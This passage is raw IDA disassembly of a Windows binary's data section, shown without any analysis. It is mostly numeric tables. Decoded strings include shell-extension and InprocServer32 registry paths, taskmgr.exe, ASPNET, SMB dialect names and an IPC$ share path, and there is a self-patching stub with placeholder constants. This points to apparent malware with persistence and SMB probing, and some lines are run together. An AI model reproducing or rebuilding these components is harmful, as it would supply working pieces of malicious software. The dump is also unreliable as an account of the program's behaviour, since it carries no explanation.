dd 8351831Fh, 2A382A36h, 0C4B0C49Ch, 22BD22C8h, 0D55AD5F8h
dd 0BDFCBDC3h, 48604878h, 0FF62FFCEh, 4C964C07h, 416C4177h
dd 0C742C7E6h, 0EBF7EB24h, 1C101C14h, 5D7C5D63h
db 22h, 36h
word_41B10A dw 3628h ; DATA XREF: sub_408440+2E1�o
; sub_408440:loc_40875D�o ...
dd 672767C0h, 0E98CE9AFh, 441344F9h, 149514EAh, 0F59CF5BBh
dd 0CFC7CF18h, 3F243F2Dh, 0C046C0E3h, 723B72DBh, 5470546Ch
dd 29CA294Ch, 0F0E3F035h, 88508FEh, 0C6CBC617h, 0F311F34Fh
dd 8CD08CE4h, 0A493A459h, 0CAB8CA96h, 68A6683Bh, 0B883B84Dh
dd 38203828h, 0E5FFE52Eh, 0AD9FAD56h, 0B770B84h, 0C8C3C81Dh
dd 99CC99FFh, 580358EDh, 196F199Ah, 0E080E0Ah, 95BF957Eh
dd 70407050h, 0F7E7F730h, 6E2B6ECFh, 1FE21F6Eh, 0B579B53Dh
dd 90C090Fh, 61AA6134h, 57825716h, 9F419F0Bh, 9D3A9D80h
dd 11EA1164h, 25B925CDh, 0AFE4AFDDh, 459A4508h, 0DFA4DF8Dh
dd 0A397A35Ch, 0EA7EEAD5h, 35DA3558h, 0ED7AEDD0h, 431743FCh
dd 0F866F8CBh, 0FB94FBB1h, 37A137D3h, 0FA1DFA40h, 0C23DC268h
dd 0B4F0B4CCh, 32DE325Dh, 9CB39C71h, 560B56E7h, 0E372E3DAh
dd 87A78760h, 151C151Bh, 0F9EFF93Ah, 63D163BFh, 345334A9h
dd 9A3E9A85h, 0B18FB142h, 7C337CD1h, 8826889Bh, 3D5F3DA6h
dd 0A1ECA1D7h, 0E476E4DFh, 812A8194h, 91499101h, 0F810FFBh
dd 0EE88EEAAh, 16EE1661h, 0D721D773h, 97C497F5h, 0A51AA5A8h
dd 0FEEBFE3Fh, 6DD96DB5h, 78C578AEh, 0C539C56Dh, 1D991DE5h
dd 76CD76A4h, 3EAD3EDCh, 0CB31CB67h, 0B68BB647h, 0EF01EF5Bh
dd 1218121Eh, 602360C5h, 6ADD6AB0h, 4D1F4DF6h, 0CE4ECEE9h
dd 0DE2DDE7Ch, 55F9559Dh, 7E487E5Ah, 214F21B2h, 3F2037Ah
dd 0A065A026h, 5E8E5E19h, 5A785A66h, 655C654Bh, 6258624Eh
dd 0FD19FD45h, 68D06F4h, 40E54086h, 0F298F2BEh, 335733ACh
dd 17671790h, 57F058Eh, 0E805E85Eh, 4F644F7Dh, 89AF896Ah
dd 10631095h, 74B6742Fh, 0AFE0A75h, 5CF55C92h, 9BB79B74h
dd 2D3C2D33h, 30A530D6h, 2ECE2E49h, 49E94989h, 46684672h
dd 77447755h, 0A8E0A8D8h, 964D9604h, 284328BDh, 0A969A929h
dd 0D929D979h, 862E8691h, 0D1ACD187h, 0F415F44Ah, 8D598D15h
dd 0D6A8D682h, 0B90AB9BCh, 429E420Dh, 0F66EF6C1h, 2F472FB8h
dd 0DDDFDD06h, 23342339h, 0CC35CC62h, 0F16AF1C4h, 0C1CFC112h
dd 85DC85EBh, 8F228F9Eh, 71C971A1h, 90C090F0h
db 53h, 0AAh
word_41B362 dw 0AA9Bh ; DATA XREF: rdata:0040463C�o
; rdata:0040465D�o
dd 18901F1h, 8BD48BE1h, 4EED4E8Ch, 8EAB8E6Fh, 0AB12ABA2h
db 3Eh, 6Fh
dword_41B37A dd 0E6546FA2h ; rdata:00405388�r
dw 0E60Dh
dd 0DB52DBF2h, 92BB927Bh, 0B702B7B6h, 692F69CAh, 39A939D9h
dd 0D3D7D30Ch, 0A761A723h, 0A21EA2ADh, 0C3B4C399h, 6C506C44h
dd 7040705h, 4F6047Fh, 27C22746h, 0AC16ACA7h, 0D025D076h
dd 50865013h, 0DC56DCF7h, 8455841Ah, 0E109E151h, 7ABE7A25h
dd 139113EFh, 0D939A9D9h, 90176790h, 719CB371h, 0D2A6E8D2h
dd 5070405h, 9852FD98h, 6580A365h, 0DFE476DFh, 8459A08h
dd 24B9202h, 0A0E080A0h, 665A7866h, 0DDAFE4DDh, 0B06ADDB0h
dd 0BF63D1BFh, 362A3836h, 54E60D54h, 4320C643h, 62CC3562h
dd 0BEF298BEh, 1E12181Eh, 24EBF724h, 0D7A1ECD7h, 77416C77h
dd 0BD2843BDh, 32BC7532h, 0D47B37D4h, 9B88269Bh, 700DFA70h
dd 0F94413F9h, 0B1FB94B1h, 5A7E485Ah, 7A03F27Ah, 0E48CD0E4h
dd 47B68B47h, 3C24303Ch, 0A5E784A5h, 416B5441h, 6DDDF06h
dd 0C56023C5h, 45FD1945h, 0A33A5BA3h, 68C23D68h, 158D5915h
dd 21ECF321h, 3166AE31h, 3E6FA23Eh, 16578216h, 95106395h
dd 5BEF015Bh, 4DB8834Dh, 91862E91h, 0B56DD9B5h, 1F83511Fh
dd 53AA9B53h, 635D7C63h, 3B68A63Bh, 3FFEEB3Fh, 0D630A5D6h
dd 257ABE25h, 0A7AC16A7h, 0F090C0Fh, 35F0E335h, 23A76123h
dd 0F090C0F0h, 0AFE98CAFh, 809D3A80h, 925CF592h, 810C7381h
dd 27312C27h, 76D02576h, 0E7560BE7h, 7B92BB7Bh, 0E9CE4EE9h
dd 0F10189F1h, 9F1E6B9Fh, 0A93453A9h, 0C4F16AC4h, 99C3B499h
dd 975BF197h, 8347E183h, 6B18E66Bh, 0C822BDC8h, 0E98450Eh
dd 6E1FE26Eh, 0C9B3F4C9h, 2F74B62Fh, 0CBF866CBh, 0FF99CCFFh
dd 0EA1495EAh, 0ED5803EDh, 0F7DC56F7h, 0E18BD4E1h, 1B151C1Bh
dd 0ADA21EADh, 0CD3D70Ch, 2BE2FB2Bh, 1DC8C31Dh, 195E8E19h
dd 0C22CB5C2h, 8949E989h, 12C1CF12h, 7E95BF7Eh, 207DBA20h
dd 6411EA64h, 840B7784h, 6DC5396Dh, 6A89AF6Ah, 0D17C33D1h
dd 0A171C9A1h, 0CEFF62CEh, 37BB7137h, 0FB0F81FBh, 3DB5793Dh
dd 51E10951h, 0DC3EADDCh, 2D3F242Dh, 0A476CDA4h, 9D55F99Dh
dd 0EE82D8EEh, 8640E586h, 0AE78C5AEh, 0CD25B9CDh, 4964D04h
dd 55774455h, 0A0E080Ah, 13508613h, 30F7E730h, 0D337A1D3h
dd 40FA1D40h, 3461AA34h, 8C4EED8Ch, 0B3B006B3h, 6C54706Ch
dd 2A73B22Ah, 523BD252h, 0B9F410Bh, 8B027B8Bh, 88D8A088h
dd 4FF3114Fh, 67CB3167h, 4627C246h, 0C06727C0h, 0B4FC90B4h
dd 28382028h, 7F04F67Fh, 78486078h, 2EE5FF2Eh, 74C9607h
dd 4B655C4Bh, 0C72BB1C7h, 6F8EAB6Fh, 0D429E0Dh, 0BBF59CBBh
dd 0F2DB52F2h, 0F34A1BF3h, 0A63D5FA6h, 59A49359h, 0BCB90ABCh
dd 3AF9EF3Ah, 0EF1391EFh, 0FE0885FEh, 1914901h, 6116EE61h
dd 7CDE2D7Ch, 0B2214FB2h, 42B18F42h, 0DB723BDBh, 0B82F47B8h
dd 48BF8748h, 2CAE6D2Ch, 0E3C046E3h, 573CD657h, 859A3E85h
dd 29A96929h, 7D4F647Dh, 94812A94h, 492ECE49h, 17C6CB17h
dd 0CA692FCAh, 0C3BDFCC3h, 5CA3975Ch, 5EE8055Eh, 0D0ED7AD0h
dd 87D1AC87h, 8E057F8Eh, 0BA64D5BAh, 0A8A51AA8h, 0B7264BB7h
dd 0B9BE0EB9h, 6087A760h, 0F8D55AF8h, 22362822h, 111B1411h
dd 0DE753FDEh, 79D92979h, 0AAEE88AAh, 332D3C33h, 5F794C5Fh
dd 0B6B702B6h, 96CAB896h, 5835DA58h, 9CC4B09Ch, 0FC4317FCh
dd 1A84551Ah, 0F64D1FF6h, 1C598A1Ch, 38B27D38h, 0AC3357ACh
dd 18CFC718h, 0F4068DF4h, 69537469h, 749BB774h, 0F597C4F5h
dd 56AD9F56h, 0DAE372DAh, 0D5EA7ED5h, 4AF4154Ah, 9E8F229Eh
dd 0A2AB12A2h, 4E62584Eh, 0E85F07E8h, 0E51D99E5h, 39233439h
dd 0C1F66EC1h, 446C5044h, 5D32DE5Dh, 72466872h, 26A06526h
dd 93CDBC93h, 3DADB03h, 0C6BAF8C6h, 0FA9EC8FAh, 82D6A882h
dd 0CF6E2BCFh
db 50h, 40h
dword_41B782 dd 0DCEB5070h ; sub_403D20+43�r ...
word_41B786 dw 0EB85h ; DATA XREF: sub_403D20+2A�o
; ---------------------------------------------------------------------------
loc_41B788: ; CODE XREF: .data:loc_41B788�j
jnz short loc_41B788
; ---------------------------------------------------------------------------
dword_41B78A dd 328A750Ah dw 8A93h
dd 8DDFA48Dh
db 4Ch, 0CAh
dword_41B796 dd 10144C29h dword_41B79A dd 2173141Ch ; rdata:00403CFC�r ...
dword_41B79E dd 0F0CC73D7h ; sub_403D90+43�r ...
dword_41B7A2 dd 0D309CCB4h ; sub_403D90+2C�r ...
dw 9D4h
db 10h, 5Dh
word_41B7AA dw 108Ah ; DATA XREF: sub_409C10+31�o
; sub_409C10+DD�o ...
dd 0E2510FE2h, 0
dd 9A196F9Ah, 0E01A9DE0h, 8F94368Fh, 0E6C742E6h, 0ECC94AECh
dd 0FDD25EFDh, 0AB7FC1ABh, 0D8A8E0D8h, 0
db 2 dup(0)
word_41B7DA dw 0 ; DATA XREF: sub_409C10+E9�o
; sub_409C10+115�o ...
align 10h
dd offset aWins+1
align 8
dd offset aAspnet ; "ASPNET"
dd offset aWins+1
dd 0
dd offset asc_419EE4 ; "$"
dd 1, 2, 419DE0h, 3 dup(0)
dd 0A8h, 1Fh dup(0)
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd 2 dup(0)
dd 0C0h, 46000000h, 0
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D31F+1
dd 10Ch, 0
dd 0C0h, 46000000h, 40D210h, 40D290h, 40D2C0h, 40D350h
dd 40D3D0h, 1, 0
dd 0C0h, 46000000h, 3 dup(0)
dd 49534C43h, 73255C44h, 534C4300h, 255C4449h, 6E495C73h
dd 636F7270h, 76726553h, 32337265h, 732500h, 255C7325h
dd 5C2A0073h, 6C656873h, 5C78656Ch, 746E6F43h, 4D747865h
dd 48756E65h, 6C646E61h, 5C737265h, 25007325h, 68735C73h
dd 656C6C65h, 73250078h, 6568735Ch, 78656C6Ch, 6F63495Ch
dd 6E61486Eh, 72656C64h, 735C2A00h, 6C6C6568h, 435C7865h
dd 65746E6Fh, 654D7478h, 6148756Eh, 656C646Eh, 255C7372h
dd 73h, 6F620000h, 43006874h, 4449534Ch, 72754300h, 726556h
dd 65726854h, 6E696461h, 646F4D67h, 53006C65h, 6C6C6568h
dd 2E6C6C44h, 68530031h, 446C6C65h, 43006C6Ch, 62696C6Fh
dd 726F6620h, 7A616C20h, 75672079h, 8E007379h, 9200419Fh
dd 9700419Fh, 9D00419Fh, 0A400419Fh, 0B300419Fh, 0BE00419Fh
dd 0C700419Fh, 100419Fh, 6 dup(1010101h), 0C0101h, 0
dd 9F008000h, 0A2C40041h, 2 dup(9FDB0041h), 0A1C50041h
dd 41h, 9F098000h, 0A2C40041h, 2 dup(9FDB0041h), 0A2C00041h
dd 41h, 9F098000h, 0A2C40041h, 9FDB0041h, 9FEB0041h, 9FDF0041h
dd 41h, 9F218000h, 9FEF0041h, 2 dup(9FDB0041h), 9FF70041h
dd 41h, 9F248000h, 9FEF0041h, 9FE30041h, 9FDB0041h, 0A2C40041h
dd 41h
dword_41BA94 dd 9F218000h ; sub_403B90+65�r
dword_41BA98 dd 9FF30041h ; sub_403B90+A2�r
dword_41BA9C dd 9FDB0041h ; sub_403B90+7D�r
dword_41BAA0 dd 9FDB0041h, 9FF70041h, 41h, 9F248000h, 9FF30041h, 9FE70041h
; DATA XREF: sub_4099E5+E�o
dd 9FDB0041h, 9FEF0041h, 41h, 9F2A8000h, 0A1C50041h, 2 dup(9FDB0041h)
dd 0A2C40041h, 41h, 9F4B8000h, 0A1B90041h, 3 dup(9FDB0041h)
dd 41h, 9F568000h, 0A1B90041h, 2 dup(9FDB0041h), 0A2C40041h
dd 41h, 9F218000h, 0A1B50041h, 2 dup(9FDB0041h), 0A1B90041h
dd 41h, 9F218000h, 0A1B90041h, 2 dup(9FDB0041h), 0A1C10041h
dd 10041h, 0A1950000h, 0A2300041h, 41h, 4 dup(0)
dd 642E0000h, 64006C6Ch, 69466C6Ch, 4700656Ch
dword_41BB68 dd 61504B54h ; sub_409C10+2B�r
dword_41BB6C dd 41006567h, 63696C70h, 6F697461h, 7845206Eh, 736E6574h
; DATA XREF: sub_409C10+22�o
dd 206E6F69h, 657A6953h, 6C6C4400h, 62694C20h, 79726172h
dd 8 dup(0)
dd 41A15A00h, 41A15F00h, 41A16700h, 41A16F00h, 41A18900h
dd 2 dup(0)
dd offset dword_41A2C8+38h
align 8
dd offset aAspnet ; "ASPNET"
dd offset dword_41A3B4+0Ch
dd 0
dd offset dword_41A3B4+1Ch
dd offset dword_41A2C8+38h
align 10h
dd offset dword_41A2C8+48h
dd offset dword_41A2C8+58h
dd 0
dd offset dword_41A2C8+70h
dd offset dword_41A374+1Ch
dword_41BC04 dd 0 ; rdata:00403777�o ...
off_41BC08 dd offset dword_41A3A4 ; DATA XREF: rdata:loc_403959�r
; sub_403970+2B�w
off_41BC0C dd offset dword_41A3F0 ; DATA XREF: sub_403970:loc_403993�w
dd 0
off_41BC14 dd offset dword_41A400 ; DATA XREF: rdata:00403910�w
off_41BC18 dd offset aSw0cp8xucxxq6y+20h ; DATA XREF: sub_403970:loc_4039B6�w
; sub_403970:loc_4039BE�w
dword_41BC1C dd 0 off_41BC20 dd offset aSw0cp8xucxxq6y+38h ; DATA XREF: rdata:004038FD�w
; sub_403970+59�r ...
off_41BC24 dd offset dword_41A350 ; DATA XREF: sub_4099E5+35�w
; sub_4099E5+43�r
dd 0
off_41BC2C dd offset dword_41A374 ; DATA XREF: rdata:004037F4�w
; sub_403970:loc_403982�r
dd 0
dword_41BC34 dd 8 ; rdata:004034E0�w ...
off_41BC38 dd offset dword_41A1D0 ; DATA XREF: sub_403400+23�r
; rdata:004034D3�o ...
off_41BC3C dd offset loc_40D3EE+2 ; DATA XREF: rdata:0040394C�r
; sub_4099E5+E2�r
off_41BC40 dd offset loc_40D406+4 ; DATA XREF: sub_404CC5+9B�w
; sub_404CC5+AF�o
align 8
dword_41BC48 dd 0F4h dword_41BC4C dd 0 dword_41BC50 dd 0 dword_41BC54 dd 0 dword_41BC58 dd 0 dword_41BC5C dd 0 dd 0Ch dup(0)
dword_41BC90 dd 0 ; rdata:loc_4053D7�r ...
dword_41BC94 dd 0 ; rdata:00405352�r ...
dword_41BC98 dd 0 ; rdata:00405364�r
dword_41BC9C dd 0 ; rdata:0040536A�r
dword_41BCA0 dd 0 ; rdata:004053EC�r ...
dword_41BCA4 dd 0 ; rdata:00405358�r
dword_41BCA8 dd 0 dword_41BCAC dd 0 dword_41BCB0 dd 0 dword_41BCB4 dd 0 dword_41BCB8 dd 0 dword_41BCBC dd 0 dd offset dword_41BEE0
dd offset off_41BFE4
a08lx04x04x02x0 db '{%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}',0
dd offset word_41A01A
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D58E+2
dd 214E8h, 0
dd 0C0h, 46000000h, 40D210h, 40D290h, 40D2C0h, 40D639h
dd 40D603h, 40D5D0h, 214E4h, 0
dd 0C0h, 46000000h, 4Eh, 0
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D31F+1
dd offset loc_40D680
dd offset loc_40D68A+2
dd offset loc_40D695
dd offset loc_40D6A1
dd offset loc_40D6AC+1
dd 10Bh, 0
dd 0C0h, 46000000h, 3 dup(0)
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D6E1+2
dd offset loc_40D6BC+4
; ---------------------------------------------------------------------------
jmp short near ptr word_41BDBA
; ---------------------------------------------------------------------------
dw 2
dd 0
dd 0C0h, 46000000h, 986h
db 2 dup(0)
word_41BDBA dw 0 ; CODE XREF: .data:0041BDA4�j
align 10h
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D6F0
dd 214EFh, 0
dd 0C0h, 46000000h, 299Eh, 3 dup(0)
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D71E+2
dd 214F5h, 0
dd 0C0h, 46000000h, 6B736174h, 2E67726Dh, 657865h, 5 dup(0)
dd offset loc_40D20B+5
dd offset loc_40D28C+4
dd offset loc_40D2BF+1
dd offset loc_40D777+9
dd offset loc_40D7A9+3
dd offset loc_40D7BC
dd 0C6C4200h, 11D0C589h, 0C0009A99h, 0E155D64Fh, 2 dup(0)
; ---------------------------------------------------------------------------
mov dword ptr [esp+24h], 12345678h
mov eax, [esp+24h]
mov dword ptr [eax], 12345678h
xor dword ptr [eax], 12345678h
mov eax, [esp+24h]
add dword ptr [eax], 12345678h
xor dword ptr [eax], 12345678h
xor edx, edx
mov dl, 4
add [esp+18h], edx
push 12345678h
retn
; ---------------------------------------------------------------------------
dw 7C8Bh
dd 78B81424h, 0AB123456h, 14247C8Bh, 34567868h, 0A5F48B12h
dd 247C8B58h, 78088114h, 0C0123456h, 0B1C944B0h, 54B2D24Ch
dd 445CB3DBh, 14C3000h, 32025431h, 7433035Ch
dword_41BED0 dd 57C3604h ; rdata:loc_40F6E7�w ...
dd 37h, 2 dup(0)
dword_41BEE0 dd 52h, 40h, 0 dd 34h, 2 dup(0)
dd 62h, 6 dup(0)
dd 52h, 40h, 0
dd 65470198h, 6F725074h, 64644163h, 73736572h, 2480000h
dd 64616F4Ch, 7262694Ch, 41797261h, 454B0000h, 4C454E52h
dd 642E3233h, 6C6Ch, 70h, 3 dup(0)
dd 21C6Ah, 41F6Fh, 41FE8h, 420FFh, 520FFh, 606C7h, 6082Ah
dd 60856h, 0A1F6Fh, 0A1FE8h, 0A20FFh, 0A225Fh, 0A2306h
dd 0B1F6Fh, 0B2306h, 0C1C7Bh, 0E1C83h, 0F0C05h, 1220FCh
dd 131F62h, 131F8Eh, 131FBCh, 132359h, 192353h, 1923FAh
dd 1C23DAh, 1C24FAh, 1D24FAh, 23209Eh, 2723CAh, 2A2263h
dd 3D23FAh, 3D24FAh
off_41BFE4 dd offset loc_4023F9+1 ; DATA XREF: .data:0041BCC4�o
dd offset loc_4024F9+1
dd 452397h, 5A0C05h, 5C0C05h, 5D0813h, 5D0883h, 5D0C05h
dd 5F088Eh, 5F0C05h, 5F0D0Fh, 5F0D15h, 600C05h, 600C7Ah
dd 600C84h, 600D0Fh, 600D15h, 690813h, 7B7920h, 7B9D76h
dd 7B9DEAh, 7C9FC8h, 0
dd 8080800h, 7080810h, 3020100h, 6070605h
dword_41C050 dd 4020100h ; rdata:0040FC0C�w ...
dd 70605h, 28181008h, 203830h
dword_41C060 dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
; DATA XREF: sub_412700+6�o
; sub_412700+3A�o ...
dd 18171615h
dword_41C078 dd 1C1B1A19h ; sub_41274B:loc_41278A�r ...
dd 471F1E1Dh, 4F0041A6h, 560041A6h, 5E0041A6h, 5F0041A6h
dd 2000000h, 101h, 0D0F700h, 10102h, 0D8F70000h, 1010300h
dd 83000102h, 10300D8h, 10201h, 300C083h, 1020101h, 0E88300h
dd 2010103h, 0E0C10001h, 1010300h, 0C1000102h, 10300E8h
dd 10201h, 300C0C1h, 1020101h, 0C8C100h, 2010103h, 0D0C10001h
dd 1010300h, 0C1000102h, 10300D0h, 10201h, 300E0C1h, 1020101h
dd 0F8C100h, 1010005h, 0B80004h, 1010600h, 81000402h, 10600C0h
dd 40201h, 600E881h, 4020101h, 0E08100h, 2010106h, 0C8810004h
dd 1010600h, 81000402h, 10600F0h, 40201h, 600D881h, 4020101h
dd 0C0F700h, 10001h, 910100h, 1020300h, 0F030000h, 203C0B6h
dd 3000001h, 2C0BE0Fh, 101h, 0E0F700h, 10102h, 0E8F70000h
dd 1020300h, 0F020103h, 204C0C1h, 2010301h, 4C0A40Fh, 1030102h
dd 0C0AC0F02h, 2010106h, 808D0004h, 1010300h, 8D000102h
dd 1020040h, 1, 200C08Bh, 101h, 0C00300h, 10102h, 0C02B0000h
dd 1010200h, 33000000h, 10200C0h, 1, 200C00Bh, 101h, 0C02300h
dd 10102h, 0C0850000h, 1020300h, 66000000h, 203C08Bh, 1
dd 3C00366h, 102h, 0C02B6600h, 10203h, 33660000h, 10203C0h
dd 66000000h, 203C00Bh, 1, 3C02366h, 102h, 0C0856600h
dd 2 dup(0)
dd 48000081h, 464B4320h, 454E4544h, 45444643h, 46434646h
dd 46464547h, 43414343h, 2 dup(43414341h), 45200041h, 4550454Dh
dd 45424544h, 4549454Dh, 46444650h, 43414345h, 2 dup(43414341h)
dd 414141h, 2 dup(0)
aWindows2000219 db 'Windows 2000 2195',0
aWindows20005_0 db 'Windows 2000 5.0',0
align 4
aE db '…',0
align 4
dd 20435002h, 5754454Eh, 204B524Fh, 474F5250h, 204D4152h
dd 302E31h, 43494D02h, 4F534F52h, 4E205446h, 4F575445h
dd 20534B52h, 33302E31h, 494D0200h, 534F5243h, 2054464Fh
dd 5754454Eh, 534B524Fh, 302E3320h, 414C0200h, 4E414D4Eh
dd 302E31h, 314D4C02h, 3058322Eh, 2003230h, 4D4E414Ch
dd 2E324E41h, 4E020031h, 414C2054h, 4E414D4Eh, 302E3120h
dd 544E0200h, 204D4C20h, 32312E30h, 0
aSmbserverIpc_0 db '\\*SMBSERVER\IPC$',0
align 4
a????? db '?????',0
align 4
aS_2 db '\\%s',0
align 4
dd 2 dup(0)
dd 5049505Ch, 4005C45h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 3 dup(0)
dd 21293139h, 1091119h, 222A323Ah, 20A121Ah, 232B333Bh
dd 30B131Bh, 242C343Ch, 272F373Fh, 70F171Fh, 262E363Eh
dd 60E161Eh, 252D353Dh, 50D151Dh, 40C141Ch, 180B110Eh
dd 1C030501h, 0A15060Fh, 40C1317h, 710081Ah, 20D141Bh
dd 251F3429h, 281E372Fh, 30212D33h, 3827312Ch, 2A2E3522h
dd 201D2432h, 222A323Ah, 20A121Ah, 242C343Ch, 40C141Ch
dd 262E363Eh, 60E161Eh, 28303840h, 8101820h, 21293139h
dd 1091119h, 232B333Bh, 30B131Bh, 252D353Dh, 50D151Dh
dd 272F373Fh, 70F171Fh, 3020120h, 5040504h, 9080706h, 0B0A0908h
dd 0D0C0D0Ch, 11100F0Eh, 13121110h, 15141514h, 19181716h
dd 1B1A1918h, 1D1C1D1Ch, 1201F1Eh, 15140710h, 111C0C1Dh
dd 1A170F01h, 0A1F1205h, 0E180802h, 9031B20h, 61E0D13h
dd 19040B16h, 10300828h, 20401838h, 0F2F0727h, 1F3F1737h
dd 0E2E0626h, 1E3E1636h, 0D2D0525h, 1D3D1535h, 0C2C0424h
dd 1C3C1434h, 0B2B0323h, 1B3B1333h, 0A2A0222h, 1A3A1232h
dd 9290121h, 19391131h, 2020101h, 2020202h, 2020201h, 1020202h
dd 10D040Eh, 80B0F02h, 0C060A03h, 7000905h, 4070F00h, 10D020Eh
dd 0B0C060Ah, 8030509h, 80E0104h, 0B02060Dh, 7090C0Fh
dd 50A03h, 2080C0Fh, 7010904h, 0E030B05h, 0D06000Ah, 0E08010Fh
dd 4030B06h, 0D020709h, 0A05000Ch, 7040D03h, 0E08020Fh
dd 0A01000Ch, 50B0906h, 0B070E00h, 10D040Ah, 60C0805h
dd 0F020309h, 10A080Dh, 2040F03h, 0C07060Bh, 90E0500h
dd 0E09000Ah, 50F0306h, 70C0D01h, 802040Bh, 900070Dh, 0A060403h
dd 0E050802h, 10F0B0Ch, 904060Dh, 30F08h, 0C02010Bh, 70E0A05h
dd 0D0A01h, 7080906h, 30E0F04h, 0C02050Bh, 30E0D07h, 0A090600h
dd 5080201h, 0F040C0Bh, 50B080Dh, 3000F06h, 0C020704h
dd 90E0A01h, 9060Ah, 0D070B0Ch, 0E03010Fh, 4080205h, 6000F03h
dd 80D010Ah, 0B050409h, 0E02070Ch, 1040C02h, 60B0A07h
dd 0F030508h, 90E000Dh, 0C020B0Eh, 10D0704h, 0A0F0005h
dd 6080903h, 0B010204h, 8070D0Ah, 50C090Fh, 0E000306h
dd 70C080Bh, 0D020E01h, 9000F06h, 305040Ah, 0F0A010Ch
dd 8060209h, 4030D00h, 0B05070Eh, 2040F0Ah, 5090C07h, 0E0D0106h
dd 8030B00h, 50F0E09h, 30C0802h, 0A040007h, 60B0D01h, 0C020304h
dd 0A0F0509h, 7010E0Bh, 0D080006h, 0E020B04h, 0D08000Fh
dd 7090C03h, 1060A05h, 70B000Dh, 0A010904h, 0C05030Eh
dd 6080F02h, 0D0B0401h, 0E07030Ch, 8060F0Ah, 2090500h
dd 80D0B06h, 70A0401h, 0F000509h, 0C03020Eh, 408020Dh
dd 10B0F06h, 0E03090Ah, 70C0005h, 80D0F01h, 407030Ah, 0B06050Ch
dd 2090E00h, 1040B07h, 20E0C09h, 0D0A0600h, 805030Fh, 70E0102h
dd 0D080A04h, 90C0Fh, 0B060503h, 2153474Bh, 25242340h
dd 4Ch dup(0)
db 0
db 10h, 2 dup(0)
db 0FCh ; ü
align 4
db 1Fh
db 30h, 25h, 30h
db 85h ; …
db 30h, 8Bh, 30h
db 91h ; ‘
db 30h, 0A7h, 30h
db 0D4h ; Ô
db 30h, 0E2h, 30h
db 0E8h ; è
db 30h, 3Ah, 31h
db 40h ; @
db 31h, 0A7h, 31h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 31h, 0EFh, 31h
db 0F4h ; ô
db 31h, 0FBh, 31h
db 9
db 32h, 10h, 32h
db 28h ; (
db 32h, 3Ch, 32h
db 43h ; C
db 32h, 57h, 32h
db 67h ; g
db 32h, 75h, 32h
db 0FCh ; ü
db 32h, 0Ch, 33h
db 13h
db 33h, 3Ch, 33h
db 4Ch ; L
db 33h, 53h, 33h
db 5Eh ; ^
db 33h, 67h, 33h
db 78h ; x
db 33h, 7Fh, 33h
db 85h ; …
db 33h, 0ABh, 33h
db 0B7h ; ·
db 33h, 0BEh, 33h
db 0E3h ; ã
db 33h, 0EAh, 33h
db 0F6h ; ö
db 33h, 4, 34h
db 33h ; 3
db 34h, 40h, 34h
db 47h ; G
db 34h, 56h, 34h
db 6Eh ; n
db 34h, 75h, 34h
db 93h ; “
db 34h, 0A0h, 34h
db 0A7h ; §
db 34h, 0B2h, 34h
db 0BBh ; »
db 34h, 0C7h, 34h
db 0CEh ; Î
db 34h, 0EEh, 34h
db 0F3h ; ó
db 34h, 0F9h, 34h
db 0FEh ; þ
db 34h, 8, 35h
db 12h
db 35h, 4Eh, 35h
db 5Bh ; [
db 35h, 84h, 35h
db 94h ; ”
db 35h, 9Dh, 35h
db 0A6h ; ¦
db 35h, 0B8h, 35h
db 0C0h ; À
db 35h, 0C5h, 35h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 35h, 0E6h, 35h
db 0F6h ; ö
db 35h, 65h, 36h
db 7Dh ; }
db 36h, 9Fh, 36h
db 0E0h ; à
db 36h, 0F3h, 36h
db 2Bh ; +
db 37h, 33h, 37h
db 40h ; @
db 37h, 46h, 37h
db 4Ch ; L
db 37h, 7Dh, 37h
db 9Ah ; š
db 37h, 0A6h, 37h
db 0B1h ; ±
db 37h, 0BEh, 37h
db 0C9h ; É
db 37h, 0D2h, 37h
db 0DDh ; Ý
db 37h, 0F7h, 37h
db 0Fh
db 38h, 34h, 38h
db 55h ; U
db 38h, 5Bh, 38h
db 75h ; u
db 38h, 7Bh, 38h
db 9Dh ;
db 38h, 0A3h, 38h
db 0D5h ; Õ
db 38h, 0DBh, 38h
db 0F8h ; ø
db 38h, 0FEh, 38h
db 25h ; %
db 39h, 3Eh, 39h
db 4Ch ; L
db 39h, 65h, 39h
db 74h ; t
db 39h, 7Eh, 39h
db 9Dh ;
db 39h, 0ABh, 39h
db 0BEh ; ¾
db 39h, 0D5h, 39h
db 0Ah
db 3Ah, 92h, 3Ah
db 0FDh ; ý
db 3Bh, 0EDh, 3Dh
db 31h ; 1
db 3Eh, 18h, 3Fh
db 62h ; b
db 3Fh, 0C1h, 3Fh
db 0
db 20h, 2 dup(0)
db 78h ; x
align 4
db 0A9h ; ©
db 30h, 1Dh, 31h
db 25h ; %
db 31h, 5Eh, 31h
db 0DAh ; Ú
db 31h, 3Dh, 32h
db 5Eh ; ^
db 32h, 0F7h, 32h
db 0C8h ; È
db 33h, 0E5h, 33h
db 6
db 36h, 6Ah, 36h
db 0C9h ; É
db 36h, 0DDh, 36h
db 20h
db 37h, 60h, 37h
db 65h ; e
db 37h, 7Fh, 37h
db 84h ; „
db 37h, 0D6h, 38h
db 2Fh ; /
db 39h, 37h, 39h
db 3Dh ; =
db 39h, 41h, 39h
db 46h ; F
db 39h, 4Ch, 39h
db 52h ; R
db 39h, 58h, 39h
db 62h ; b
db 39h, 6Ch, 39h
db 75h ; u
db 39h, 81h, 3Ch
db 8Dh ;
db 3Ch, 9Ah, 3Ch
db 0A8h ; ¨
db 3Ch, 0E2h, 3Ch
db 0DFh ; ß
db 3Eh, 0E4h, 3Eh
db 2
db 3Fh, 0Ch, 3Fh
db 16h
